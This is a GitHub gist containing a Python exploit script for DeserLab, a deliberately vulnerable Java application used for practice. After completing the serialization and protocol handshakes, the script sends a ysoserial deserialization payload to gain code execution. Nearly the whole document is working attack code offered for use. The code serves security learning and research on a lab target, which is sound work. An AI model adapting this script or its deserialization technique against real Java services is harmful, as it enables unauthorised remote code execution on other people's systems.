Skip to content

Instantly share code, notes, and snippets.

@DiabloHorn
Created September 9, 2017 18:37
Show Gist options
  • Save DiabloHorn/8630948d953386d2ed575e17f8635ee7 to your computer and use it in GitHub Desktop.
Save DiabloHorn/8630948d953386d2ed575e17f8635ee7 to your computer and use it in GitHub Desktop.
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
https://www.youtube.com/watch?v=VviY3O-euVQ
http://wouter.coekaerts.be/2015/annotationinvocationhandler
http://www.baeldung.com/java-dynamic-proxies
https://stackoverflow.com/questions/37068982/how-to-execute-shell-command-with-parameters-in-groovy
https://www.sourceclear.com/registry/security/remote-code-execution-through-object-deserialization/java/sid-1710/technical
"""
import sys
import socket
import argparse
import logging
import struct
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
class deser:
def __init__(self,tip,tport):
self.targetip = tip
self.targetport = int(tport)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self):
self.s.connect((self.targetip, self.targetport))
def javaserial(self):
blob = '\xac\xed\x00\x05'
self.s.sendall(blob)
logging.debug("server javaserial resp: %s" % self.s.recv(4).encode('hex'))
def protohello(self):
header = self.s.recv(2)
datalength = int(struct.unpack('B',header[1])[0])
logging.debug("server proto hello %s" % self.s.recv(datalength).encode('hex'))
blob = '\x77\x04'
blob2 = '\xf0\x00\xba\xaa'
self.s.sendall(blob)
self.s.sendall(blob2)
def protoversion(self):
header = self.s.recv(2)
datalength = int(struct.unpack('B',header[1])[0])
logging.debug("server version %s" % self.s.recv(datalength).encode('hex'))
blob = '\x77\x02'
blob2 = '\x01\x01'
self.s.sendall(blob)
self.s.sendall(blob2)
def clientname(self):
blob = '\x77\x09' #depends on username + type length
blob2 = '\x00\x07\x74\x65\x73\x74\x69\x6e\x67'
self.s.sendall(blob)
self.s.sendall(blob2)
def exploit(self, payload_file):
"""
Normally this is where the HashRequest object is send
instead we send a ysoserial payload, skipping the first 4 bytes
"""
payload = ''
with open(payload_file, 'rb') as content_file:
payload = content_file.read()
self.s.sendall(payload[4:])
logging.debug('after exploit: %s' % self.s.recv(1024))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit for DeserLab',epilog='https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/')
parser.add_argument('targetip',help='target ip to exploit')
parser.add_argument('targetport',help='target port to exploit')
parser.add_argument('payloadfile',help='file with the ysoserial payload')
myargs = parser.parse_args()
logging.debug("target %s" % myargs.targetip)
logging.debug("port %s" % myargs.targetport)
mydeser = deser(myargs.targetip, myargs.targetport)
logging.info("Connecting")
mydeser.connect()
logging.info("java serialization handshake")
mydeser.javaserial()
logging.info("protocol specific handshake")
mydeser.protohello()
logging.info("protocol specific version handshake")
mydeser.protoversion()
logging.info("sending name of connected client")
mydeser.clientname()
logging.info("exploiting")
mydeser.exploit(myargs.payloadfile)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment